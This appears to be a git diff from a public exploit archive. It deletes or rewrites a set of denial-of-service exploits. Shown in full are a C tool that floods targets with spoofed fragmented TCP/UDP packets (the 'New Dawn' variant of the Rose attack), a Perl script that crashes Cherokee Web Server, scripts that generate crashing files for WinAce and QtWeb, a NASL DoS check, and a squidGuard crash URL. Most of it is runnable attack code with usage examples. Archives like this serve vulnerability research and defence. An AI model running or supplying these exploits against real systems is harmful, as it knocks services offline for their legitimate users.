atoi(argv[6]); /* on error, set to 0, but that's ok */ - } - - /* seventh parameter is number of fragments per packet */ - nfrag = NUM_FRAG; - if (argc > 7) { - nfrag = atoi(argv[7]); - } - if (nfrag < 1) { nfrag = 1; } - - /* eighth parameter is delta between fragments */ - ndelta = NUM_DELTA; - if (argc > 8) { - ndelta = atoi(argv[8]); - } - - /* Make sure that the fragments do not exceed 8170 */ - - nfrag = (nfrag * ndelta) + 8; - if (nfrag > 8170) { nfrag = 8170; } - - printf("%s %d %s %d %d %d %d %d ndelta = %d\n\r", - argv[0], rp.type, argv[2], rp.port, npack, nrew, nrun, - nfrag / 8, ndelta); - - /* set to NETWIB_TRUE to activate display */ - rp.display = NETWIB_FALSE; - - /* instead of allocating memory each time, just use this permanent buffer */ - netwib_er(netwib_buf_init_mallocdefault(&rp.buf)); - - /* initialize spoofing feature */ - netwib_er(netwib_io_init_spoof_ip(NETWIB_SPOOF_IP_INITTYPE_LINKBRAW, - &rp.pio)); - - /* main function */ - ret = rose_loop(&rp, npack, nrew, 
 nrun, nfrag, ndelta);
- if (ret != NETWIB_ERR_OK) {
- netwib_er(netwib_err_display(ret, NETWIB_ERR_ENCODETYPE_FULL));
- return(ret);
- }
-
- /* close netwib */
- netwib_er(netwib_io_close(&rp.pio));
- netwib_er(netwib_buf_close(&rp.buf));
- netwib_close();
-
- return(0);
-}
-
diff --git a/platforms/windows/remote/24637.c b/platforms/windows/remote/24637.c
deleted file mode 100755
index e806724ff..000000000
--- a/platforms/windows/remote/24637.c
+++ /dev/null
@@ -1,379 +0,0 @@ -source: http://www.securityfocus.com/bid/11258/info - -Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability. - -The issue is reported to present itself due to inefficiencies present when handling fragmented TCP packets. - -The discoverer of this issue has dubbed the attack style the "New Dawn attack"; it is a variation of a previously reported attack that was named the "Rose Attack". - -A remote attacker may exploit this vulnerability to deny service to an affected computer. - -Microsoft Windows 2000/XP, Linux kernel 2.4 tree, and undisclosed Cisco systems are reported prone to this vulnerability; other products may also be affected. - -/*-------------------------------------------------------------*/ -/* - Implementation of Rose Attack described by Gandalf gandalf at digital.net - Reference: Bugtraq, 30 mars 2004, "IPv4 fragmentation, The Rose Attack" - - NewDawn4.c written by Ken Hollis based on the code rose.c - written by Laurent Constantin and NewDawn.c and NewDawn2.c - written by chuck modified from large IGMP attack by Kox by - Coolio (coolio (at) k-r4d.com) - - Program allows choice of TCP or UDP, number of packets to fragment, number - of fragments per packet and number of times the last fragment is - rewritten. - - Based on a conversation where it was mentioned that a highly fragmented - packet would cause high CPU utilization if the last fragment was written - over and over again. - - As chuck says, death by a thousand cuts. - - NewDawn4 allows smaller fragments (8 bytes) to be sent to the host. 
See: - http://digital.net/~gandalf/Rose_Frag_Attack_Explained.htm - - Usage : ./NewDawn4 type(1or2) ipaddress [port] [NumP] [Numt] [NumR] [NumF] [NumD] - Example: ./NewDawn4 1 1.2.3.4 80 5 9999 99999999 4080 2 - type : 1=tcp, 2=udp - ipaddress : address to test - port : optional port number (0 means random) - NumP : Number of packets to fragment (less than 1000) - NumT : Number of times last fragment is rewritten - NumR : Number of times to run test - NumF : Number of fragments per packet - NumD : Delta between fragements. 2 = 8 bytes blank - 16 bytes total between fragments (8 bytes - payload + 8 bytes blank = 16 bytes), - 5 = 32 bytes blank (8 bytes payload + 32 bytes - blank = 40 bytes total = 5 * 8). - - Library netwib must be installed: - http://www.laurentconstantin.com/en/netw/netwib/ - http://go.to/laurentconstantin - - To compile and run : - gcc -Wall -o NewDawn4 NewDawn4.c `netwib-config -lc` - ./NewDawn4 1 www.example.com 80 - - The command: - ./NewDawn4 1 10.12.14.16 - Is equivalent to: - ./NewDawn4 1 10.12.14.16 0 5 9999 99999999 1021 8 - Where: - ./NewDawn4 = Program Name - 1 = TCP - 10.12.14.16 = IP Address - 0 = Random port numbers - 5 = Five packets to fragment before staring next set of packets - 9999 = The number of times to rewrite the last fragment of - the five packets - 99999999 = The number of times to run this entire attack - 1021 = The number of middle fragments to write. - 8 = 64 bytes, 8 byte data + 56 bytes blank fragments (8 bytes * 8 = 64) - - This was successfully tested with netwib 5.12.0, under Linux - to test a Windows 2000 host. Local network is Ethernet. 
-*/ - -/*-------------------------------------------------------------*/ -// Test large number of packets -#define NUM_PACKETS 1000 -#define NUM_LAST 9999 -#define NUM_RUN 99999999 -#define NUM_FRAG 8170 -#define NUM_DELTA 8 - -#include -#include -#include - -/*-------------------------------------------------------------*/ -typedef enum { - ROSE_TYPE_TCP = 1, - ROSE_TYPE_UDP = 2 -} rose_type; - -/*-------------------------------------------------------------*/ -typedef struct { - rose_type type; - netwib_ip ipad; - netwib_port port; - netwib_bool display; - netwib_buf buf; - netwib_io *pio; -} rose_params; - -/*-------------------------------------------------------------*/ -static netwib_err rose_loop(rose_params *prp, int npack, int nrew, - int nrun, int nfrag, int ndelta) -{ - netwib_iphdr ipheader, ipstore[NUM_PACKETS]; - netwib_tcphdr tcpheader, tcpstore[NUM_PACKETS]; - netwib_udphdr udpheader, udpstore[NUM_PACKETS]; - netwib_buf payload; - netwib_uint32 numsent = 0; - int i, j, nrun2; - -printf("Packets %d Rewrite %d Runs %d Fragment packet to byte %d Delta %d\n\r", - npack, nrew, nrun, nfrag, ndelta); - - for (nrun2=0; nrun2type) { - case ROSE_TYPE_TCP : - netwib_er(netwib_tcphdr_initdefault(&tcpstore[i])); - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &tcpstore[i].src)); - if (prp->port == 0) { - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &tcpstore[i].dst)); - } else { - tcpstore[i].dst = prp->port; - } - break; - case ROSE_TYPE_UDP : - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &udpstore[i].src)); - if (prp->port == 0) { - netwib_er(netwib_uint32_init_rand(0, 0xFFFF, &udpstore[i].dst)); - } else { - udpstore[i].dst = prp->port; - } - break; - } - } - - for (i=0; ibuf); - ipheader = ipstore[i]; - ipheader.header.ip4.morefrag = NETWIB_TRUE; - ipheader.header.ip4.offsetfrag = 0; /* not necessary, but to be clear */ - ipheader.src.iptype = NETWIB_IPTYPE_IP4; - ipheader.src.ipvalue.ip4 = ipstore[i].src.ipvalue.ip4; - ipheader.dst = prp->ipad; - 
switch(prp->type) { - case ROSE_TYPE_TCP : - tcpheader = tcpstore[i]; - tcpheader.src = tcpstore[i].src; - tcpheader.dst = tcpstore[i].dst; - tcpheader.ack = NETWIB_TRUE; - netwib_er(netwib_buf_init_ext_text("1234567890123456789012345678", - &payload)); - netwib_er(netwib_pkt_append_iptcpdata(&ipheader, &tcpheader, &payload, - &prp->buf)); - break; - case ROSE_TYPE_UDP : - netwib_er(netwib_udphdr_initdefault(&udpheader)); - udpheader.src = udpstore[i].src; - udpheader.dst = udpstore[i].dst; - netwib_er(netwib_buf_init_ext_text("12345678901234567890123456789012", - &payload)); - netwib_er(netwib_pkt_append_ipudpdata(&ipheader, &udpheader, &payload, - &prp->buf)); - break; - } - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - - /* construct middle fragments */ - ipheader.header.ip4.offsetfrag = 0x0008; - for(ipheader.header.ip4.offsetfrag = 0x0008 ; - ipheader.header.ip4.offsetfrag< nfrag; - ipheader.header.ip4.offsetfrag = ipheader.header.ip4.offsetfrag + - ndelta){ - netwib__buf_reinit(&prp->buf); - switch(prp->type) { - case ROSE_TYPE_TCP : - ipheader.protocol = NETWIB_IPPROTO_TCP; - netwib_er(netwib_buf_init_ext_text("12345678", - &payload)); - break; - case ROSE_TYPE_UDP : - ipheader.protocol = NETWIB_IPPROTO_UDP; - netwib_er(netwib_buf_init_ext_text("12345678", - &payload)); - break; - } - netwib_er(netwib_pkt_append_ipdata(&ipheader, &payload, &prp->buf)); - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - } - - } - - printf("Rewriting %d packets last fragment %d times\r\n", - npack,nrew); fflush(stdout); - - /* construct last fragment and rewrite NUM_LAST times */ - for (j=0;jbuf); - for (i=0; iipad; - switch(prp->type) { - case ROSE_TYPE_TCP : - tcpheader = tcpstore[i]; - tcpheader.src = 
tcpstore[i].src; - tcpheader.dst = tcpstore[i].dst; - tcpheader.ack = NETWIB_TRUE; - ipheader.protocol = NETWIB_IPPROTO_TCP; - break; - case ROSE_TYPE_UDP : - udpheader.src = udpstore[i].src; - udpheader.dst = udpstore[i].dst; - ipheader.protocol = NETWIB_IPPROTO_UDP; - break; - } - - netwib__buf_reinit(&prp->buf); - ipheader.header.ip4.morefrag = NETWIB_FALSE; - ipheader.header.ip4.offsetfrag = 0x1FF0; - netwib_er(netwib_buf_init_ext_text("1234567890123456", - &payload)); - netwib_er(netwib_pkt_append_ipdata(&ipheader, &payload, &prp->buf)); - if (prp->display) { - netwib_er(netwib_pkt_ip_display(&prp->buf, NULL, NETWIB_ENCODETYPE_ARRAY, - NETWIB_ENCODETYPE_DUMP)); - } - netwib_er(netwib_io_write(prp->pio, &prp->buf)); - } - } - /* dot display */ - if (!prp->display && (numsent%100)==0) { - printf("."); fflush(stdout); - } - numsent++; - } - - return(NETWIB_ERR_OK); -} - -/*-------------------------------------------------------------*/ -int main(int argc, char* argv[]) -{ - rose_params rp; - netwib_buf ipstr; - netwib_err ret; - int npack, nrew, nrun, nfrag, ndelta; - - /* initialize netwib */ - netwib_init(); - - /* check parameter count */ - if (argc < 3 || argc > 9) { - printf("Usage : %s type(1or2) ipaddress [port] [NumP] [Numt] [NumR] [NumF] [NumD]\n", argv[0]); - printf("Example: %s 1 1.2.3.4 80 5 9999 99999999 1021 8\n", argv[0]); - printf(" type : %d=tcp, %d=udp\n", ROSE_TYPE_TCP, ROSE_TYPE_UDP); - printf(" ipaddress : address to test\n"); - printf(" port : optional port number (0 means random)\n"); - printf(" NumP : Number of packets to fragment\n"); - printf(" NumT : Number of times last fragment is rewritten\n"); - printf(" NumR : Number of times to run test\n"); - printf(" NumF : Number of fragments per packet\n"); - printf(" NumD : Delta between fragements.\n"); - return(1); - } - - /* first parameter is type */ - rp.type = atoi(argv[1]); - switch(rp.type) { - case ROSE_TYPE_TCP : - case ROSE_TYPE_UDP : - break; - default : - printf("First parameter 
must be 1 or 2 (currently=%s)\n", argv[1]); - return(2); - } - - /* second parameter is IP address */ - netwib_er(netwib_buf_init_ext_text(argv[2], &ipstr)); - ret = netwib_ip_init_buf(&ipstr, NETWIB_IP_DECODETYPE_BEST, &rp.ipad); - if (ret != NETWIB_ERR_OK) { - printf("Second parameter must be an IP or hostname (currently=%s)\n", - argv[2]); - return(3); - } - - /* third parameter is port number */ - rp.port = 0; - if (argc > 3) { - rp.port = atoi(argv[3]); /* on error, set to 0, but that's ok */ - } - - /* fourth parameter is number of packets to fragment */ - npack = 5; - if (argc > 4) { - npack = atoi(argv[4]); /* on error, set to 1 */ - } - if (npack < 1) { npack = 1; } - if (npack > 1000) { npack = 1000; } - - /* fifth parameter is number of times packet is rewritten */ - nrew = NUM_LAST; - if (argc > 5) { - nrew = atoi(argv[5]); /* on error, set to 0, but that's ok */ - } - - /* sixth parameter is number of times to run the test */ - nrun = NUM_RUN; - if (argc > 6) { - nrun = atoi(argv[6]); /* on error, set to 0, but that's ok */ - } - - /* seventh parameter is number of fragments per packet */ - nfrag = NUM_FRAG; - if (argc > 7) { - nfrag = atoi(argv[7]); - } - if (nfrag < 1) { nfrag = 1; } - - /* eighth parameter is delta between fragments */ - ndelta = NUM_DELTA; - if (argc > 8) { - ndelta = atoi(argv[8]); - } - - /* Make sure that the fragments do not exceed 8170 */ - - nfrag = (nfrag * ndelta) + 8; - if (nfrag > 8170) { nfrag = 8170; } - - printf("%s %d %s %d %d %d %d %d ndelta = %d\n\r", - argv[0], rp.type, argv[2], rp.port, npack, nrew, nrun, - nfrag / 8, ndelta); - - /* set to NETWIB_TRUE to activate display */ - rp.display = NETWIB_FALSE; - - /* instead of allocating memory each time, just use this permanent buffer */ - netwib_er(netwib_buf_init_mallocdefault(&rp.buf)); - - /* initialize spoofing feature */ - netwib_er(netwib_io_init_spoof_ip(NETWIB_SPOOF_IP_INITTYPE_LINKBRAW, - &rp.pio)); - - /* main function */ - ret = rose_loop(&rp, npack, nrew, 
nrun, nfrag, ndelta); - if (ret != NETWIB_ERR_OK) { - netwib_er(netwib_err_display(ret, NETWIB_ERR_ENCODETYPE_FULL)); - return(ret); - } - - /* close netwib */ - netwib_er(netwib_io_close(&rp.pio)); - netwib_er(netwib_buf_close(&rp.buf)); - netwib_close(); - - return(0); -} - diff --git a/platforms/windows/remote/30104.nasl b/platforms/windows/remote/30104.nasl deleted file mode 100755 index d5bc21d40..000000000 --- a/platforms/windows/remote/30104.nasl +++ /dev/null 
@@ -1,76 +0,0 @@
-source: http://www.securityfocus.com/bid/24233/info
-
-F-Secure Policy Manager is prone to a remote denial-of-service vulnerability because the application fails to propelry handle unexpected conditions.
-
-Exploiting this issue allows remote attackers to crash affected applications, denying further service to legitimate users. The vendor states that this application is typically available only to internal networks, making remote exploits over the Internet less likely.
-
-Versions of F-Secure Policy Manager prior to 7.01 are vulnerable.
-
-#
-# This script was written by David Maciejak
-#
-
-if(description)
-{
-script_id(50000);
-
-script_version("$Revision: 1.0 $");
-script_name(english:"F-Secure Policy Manager Server fsmsh.dll module DoS");
-
-desc["english"] = "
-Synopsis :
-
-The remote host is an F-Secure Policy Manager Server.
-
-Description :
-
-The remote host is running a version a F-Secure Policy Manager Server which
-is vulnerable to a denial of service.
-A malicious user can forged a request to query a MS-DOS device name through
-fsmsh.dll CGI module causing the service to stop answer to legitimate users.
-
-Solution :
-
-Not available for now.
-
-Risk factor :
-
-High";
-
-script_description(english:desc["english"]);
-script_summary(english:"Detects F-Secure Policy Manager DoS flaw");
-
- script_category(ACT_DENIAL);
- script_copyright(english:"This script is Copyright (C) 2007 David Maciejak");
- script_family(english:"Denial of Service");
- script_require_ports("Services/www", 80);
- exit(0);
-}
-
-include("http_func.inc");
-include("http_keepalive.inc");
-
-port = get_http_port(default:80);
-if ( ! port ) exit(0);
-if(!get_port_state(port))exit(0);
-
-if (safe_checks())
-{
- # only check FSMSH.DLL version
- buf = http_get(item:"/fsms/fsmsh.dll?FSMSCommand=GetVersion", port:port);
- r = http_keepalive_send_recv(port:port, data:buf, bodyonly:1);
- if( r == NULL )exit(0);
- #this could generate false positive on Linux platform
- if ("7.00.7038" >< r ) {
- security_hole(port);
- }
- exit(0);
-}
-
-buf = http_get(item:"/fsms/fsmsh.dll?FSMSCommand=DownloadPackage&Type=25&Filename=\install\dbupdate\CON", port:port);
-r = http_keepalive_send_recv(port:port, data:buf, bodyonly:1);
-buf = http_get(item:"/fsms/fsmsh.dll?FSMSCommand=GetVersion", port:port);
-r = http_keepalive_send_recv(port:port, data:buf, bodyonly:1);
-if( r == NULL ) {
- security_hole(port);
-}
diff --git a/platforms/windows/remote/30756.html b/platforms/windows/remote/30756.html
deleted file mode 100755
index 0e36fb3c1..000000000
--- a/platforms/windows/remote/30756.html
+++ /dev/null
@@ -1,49 +0,0 @@
-source: http://www.securityfocus.com/bid/26414/info
-
-Microsoft Forms 2.0 ActiveX Control is prone to multiple memory-access violation denial-of-service vulnerabilities.
-
-Attackers can exploit these issues to crash Internet Explorer and deny service to legitimate users.
-
-Note: Forms 2.0 ActiveX is distributed with any application that includes Visual Basic for Applications 5.0.
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/platforms/windows/remote/32688.py b/platforms/windows/remote/32688.py
deleted file mode 100755
index 4d8a38594..000000000
--- a/platforms/windows/remote/32688.py
+++ /dev/null
@@ -1,66 +0,0 @@ -source: http://www.securityfocus.com/bid/33049/info - -Winace is prone to a denial-of-service vulnerability. - -Attackers can exploit this issue to crash Windows Explorer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. - -Winace 2.2 is vulnerable; other versions may also be affected. - -#!/usr/bin/python -##################################### -# Author : -cN4phux -# -# Mail : cN4phux[at]Gmail[dot]com # Proud to be Algerian; # -# Site : N/A (not -yet) # -##################################### -#Greetz to all DZ's : Blub , Knuthy , His0k4 , Djug , Izem , etc . . . -# : Zigma , Heurs etc . . . - -# MS Windows Explorer Unspecified ( WinAce 2.2 ) Denial of Service Exploit -# Magic offset : -# Bug comes from shell32.dll -# EventType : BEX P1 : explorer.exe P2 : 6.0.2900.2180 P3 -: 41107ece -# P4 : shell32.dll P5 : 6.0.2900.2180 P6 : 4125330f P7 : -000e1666 -# P8 : c0000409 P9 : 00000000 -# Just right click the file and move your mouse to( Add to -"AAAAAAAAAAAAAAAAAAAAAAAA. . . .ace" ) with WinAce and you'll see ur -Explorer crashes . 
-# Successfully tested on Windows XP SP2 FR, -import sys -txt_header = ((("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41"))); # -txt_title = "\x41"*194 # -ext = ".txt"; -headers = open(txt_title + ext, "w") -headers.write(txt_header) -headers.close() -print "\nFile created successfully !"; -print "\n\cN4phux."; diff --git a/platforms/windows/remote/33707.txt b/platforms/windows/remote/33707.txt deleted file mode 100755 index fc3314c11..000000000 --- a/platforms/windows/remote/33707.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/38549/info - -Orb Networks Orb is prone to a denial-of-service vulnerability when handling malformed '.mp3' files. - -Successfully exploiting this issue allows remote attackers to deny service to legitimate users. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33707.zip \ No newline at end of file 
diff --git a/platforms/windows/remote/35873.txt b/platforms/windows/remote/35873.txt
deleted file mode 100755
index 0ea18881c..000000000
--- a/platforms/windows/remote/35873.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/48389/info
-
-Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error.
-
-An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
-
-Wireshark 1.4.5 is vulnerable.
-
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35873.pcap
\ No newline at end of file
diff --git a/platforms/windows/remote/36128.txt b/platforms/windows/remote/36128.txt
deleted file mode 100755
index ca258328b..000000000
--- a/platforms/windows/remote/36128.txt
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/49521/info
-
-Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain files.
-
-Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
-
-Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable.
-
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36128.pcap
\ No newline at end of file
diff --git a/platforms/windows/remote/37673.html b/platforms/windows/remote/37673.html
deleted file mode 100755
index e76ade42d..000000000
--- a/platforms/windows/remote/37673.html
+++ /dev/null
@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/55202/info
-
-Microsoft Indexing Service 'ixsso.dll' ActiveX control is prone to a denial-of-service vulnerability due to a null-pointer dereference error.
-
-An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.
-
-The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed.
-
- Exploit
\ No newline at end of file
diff --git a/platforms/windows/remote/6600.html b/platforms/windows/remote/6600.html
index 2f8997000..62a299242 100755
--- a/platforms/windows/remote/6600.html
+++ b/platforms/windows/remote/6600.html
@@ -1,41 +1,41 @@
-##################Chilkat IMAP ActiveX File Execution&IE DoS ################
-
-www.chilkasoft.com
-
-####By: e.wiZz!
-####Info: Bosnian Idiot FTW!
-####Site: infected.blogger.ba
-####Greetz: suN8Hclf,Luigi and peoples from hakin9 forum
-
-In the wild...
-
-#####################################################################################
-
-File: ChilkatMail_v7_9.dll
-ProgID: ChilkatMail2.ChilkatMailMan2.1
-CLSID: 126FB030-1E9E-4517-A254-430616582C50
-
-Description:
-
-Function "LoadXmlEmail()" allows us to execute file which leads to DoS in IE.
-
-Tested on IE 6,Win xp sp2
-
-#####################################################################################
-
-
-
-
-# milw0rm.com [2008-09-27]
+##################Chilkat IMAP ActiveX File Execution&IE DoS ################
+
+www.chilkasoft.com
+
+####By: e.wiZz!
+####Info: Bosnian Idiot FTW!
+####Site: infected.blogger.ba
+####Greetz: suN8Hclf,Luigi and peoples from hakin9 forum
+
+In the wild...
+
+#####################################################################################
+
+File: ChilkatMail_v7_9.dll
+ProgID: ChilkatMail2.ChilkatMailMan2.1
+CLSID: 126FB030-1E9E-4517-A254-430616582C50
+
+Description:
+
+Function "LoadXmlEmail()" allows us to execute file which leads to DoS in IE.
+
+Tested on IE 6,Win xp sp2
+
+#####################################################################################
+
+
+
+
+# milw0rm.com [2008-09-27]
diff --git a/platforms/windows/webapps/12852.txt b/platforms/windows/webapps/12852.txt
deleted file mode 100755
index d8989960b..000000000
--- a/platforms/windows/webapps/12852.txt
+++ /dev/null
@@ -1,56 +0,0 @@ -# Title:QtWeb 3.3 Remote DoS/Crash Exploit -# Software Link:http://www.qtweb.net/downloads/QtWeb-setup.exe -# Portable: http://www.qtweb.net/downloads/QtWeb.exe -# Version: 3.3 -# Platform:Windows - - -_____ _____ _ _ -| __ \ / ____| (_) | -| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _ -| ___/ \___ \ / _ \/ __| | | | '__| | __| | | | -| | ____) | __/ (__| |_| | | | | |_| |_| | -|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, | - __/ | - |___/ -Exploit ----------------- -#!/usr/bin/perl -# File Name :QtWeb 3.3 Remote DoS/Crash Exploit -# Vuln :Remote Dos/Crash -# Author :PoisonCode -# Exploit Title: QtWeb 3.3 Remote DoS/Crash Exploit -# Date:02/06/2010 -# Author:PoisonCode -# Site :http://www.qtweb.net/ -# Software Link: http://www.qtweb.net/downloads/QtWeb-setup.exe -# Portable:http://www.qtweb.net/downloads/QtWeb.exe -# Version: 3.3 -# Tested on: Windows -$file="Exploit QtWeb 3.3.html"; -print " ======================================\n"; -print " = QtWeb 3.3 Remote DoS/Crash Exploit =\n"; -print " = Autor:PoisonCode =\n"; -print " = Web :PanamaSecurity.blogspot.com =\n"; -print " ======================================\n"; -print "\n"; -print " Espere Mientras se Genera el Exploit\n"; -my $a="\x55" x 100000000; -my $b="\85" x 55900000; -my $c="\x7C\x95\x64\xAE\x00\x96\xbd\x40\x00\x09\8a\86\x5A\x65\x72\x30\x0\x54\x68\x75\x6E\x64\x65\x72"; -open(myfile,">>$file"); -print myfile ""; -print myfile "PanamaSecurity - PoisonCode $c "; -print myfile ''; -print myfile "$a,$b,$c"; -print myfile '">'; -print myfile ""; -close(myfile); -print "\n"; -print " Nombre del Archivo : $file\n"; -print " Se Ha Creado El Exploit Correctamente \n"; -print "\n"; -print "----------------------------------------------------------------------\n"; -print " Visiten : PanamaSecurity.blogspot.com\n"; \ No newline at end of file diff --git a/platforms/windows/webapps/9874.txt b/platforms/windows/webapps/9874.txt deleted file mode 100755 index fb8facac7..000000000 
--- a/platforms/windows/webapps/9874.txt
+++ /dev/null
@@ -1,111 +0,0 @@ -########################################################################################### -# -# Name : Cherokee Web Server 0.5.4 Denial Of Service -# Author: Usman Saeed -# Company: Xc0re Security Research Group -# Website: http://www.xc0re.net -# DATE: 25/10/09 -# Tested on Windows ! -########################################################################################### - -Disclaimer: [This code is for Educational Purposes , I would Not be -responsible for any misuse of this code] - -[*] Download Page : http://www.cherokee-project.com/download/windows/ - - -[*] Attack type : Remote - - -[*] Patch Status : Unpatched - - - -[*] Description : By sending a crafted GET request [GET /AUX HTTP/1.1] to -the server , the server crashes ! - - - -[*] Exploitation : - - -#!/usr/bin/perl -# Cherokee Web Server 0.5.4 Denial Of Service -# Disclaimer: -# [This code is for Educational Purposes , I would Not be responsible for -any misuse of this code] -# Author: Usman Saeed -# Company: Xc0re Security Research Group -# Website: http://www.xc0re.net -# DATE: [25/10/09] - -$host = $ARGV[0]; -$PORT = $ARGV[1]; - -$packet = "AUX"; - - -$stuff = "GET /".$packet." HTTP/1.1\r\n" . -"User-Agent:Bitch/1.0 (Windows NT 5.1; U; en)\r\n" . -"Host:127.0.0.1\r\n". -"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, -image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n". -"Accept-Language: en-US,en;q=0.9\r\n". -"Accept-Charset: iso-8859-1,*,utf-8\r\n". -"Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n"; - - - - -use IO::Socket::INET; -if (! 
defined $ARGV[0]) -{ -print "+========================================================+\n"; -print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n"; -print "+ Author [Usman Saeed] +\n"; -print "+ Company [Xc0re Security Research Group] +\n"; -print "+ DATE: [25/10/09] +\n"; -print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; -print "+ Disclaimer: [This code is for Educational Purposes , +\n"; -print "+ I would Not be responsible for any misuse of this code]+\n"; -print "+========================================================+\n"; - - - - - -exit; -} - - -$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , -PeerPort => $PORT) || die "Cant connect to $host!"; -print "+========================================================+\n"; -print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n"; -print "+ Author [Usman Saeed] +\n"; -print "+ Company [Xc0re Security Research Group] +\n"; -print "+ DATE: [25/10/09] +\n"; -print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; -print "+ Disclaimer: [This code is for Educational Purposes , +\n"; -print "+ I would Not be responsible for any misuse of this code]+\n"; -print "+========================================================+\n"; - - - - -print "\n"; - -print "[*] Initializing\n"; - -sleep(2); - -print "[*] Sendin DOS Packet \n"; - -send ($sock , $stuff , 0); -print "[*] Crashed :) \n"; -$res = recv($sock,$response,1024,0); -print $response; - - - -exit; \ No newline at end of file diff --git a/platforms/xml/webapps/37685.txt b/platforms/xml/webapps/37685.txt deleted file mode 100755 index e773389bd..000000000 --- a/platforms/xml/webapps/37685.txt +++ /dev/null 
@@ -1,14 +0,0 @@ -source: http://www.securityfocus.com/bid/55291/info - -squidGuard is prone to a remote denial-of-service vulnerability. - -A successful exploit will cause the application to enter emergency mode in which URLs are not blocked. This will result in a denial-of-service condition. - -squidGuard 1.4 is vulnerable; other versions may also be affected. - -http://www.example.com/_playlist/playlist.xml?parm=0.25732559903520535?parm=0.8294737075929047?parm=0.24014121683296297?parm=0.9460915929498649?parm=0.3974535575371201?parm=0.797955814252201?parm=0.5941665450866088?parm=0.6912115486553755?parm=0.05073890069479603?parm=0.8963961504041598?parm=0.43654825009701137?parm=0.8214705010294044?parm=0.5274569610084057?parm=0.0007274525371858687?parm=0.14506218122553893?parm=0.49125362580323495?parm=0.6941617625067622?parm=0.7331781580530978?parm=0.6610984755864507?parm=0.8694141102186517?parm=0.1290539846224843?parm=0.45549314193532453?parm=0.860371532284247?parm=0.019043415282676057?parm=0.1470360022957906?parm=0.9782236742775064?parm=0.24810547207701195?parm=0.5038849472610185?parm=0.32986064536502857?parm=0.3443933666849265?parm=0.8665425396928025?parm=0.8360460125669642?parm=0.11572512117125244?pa - 
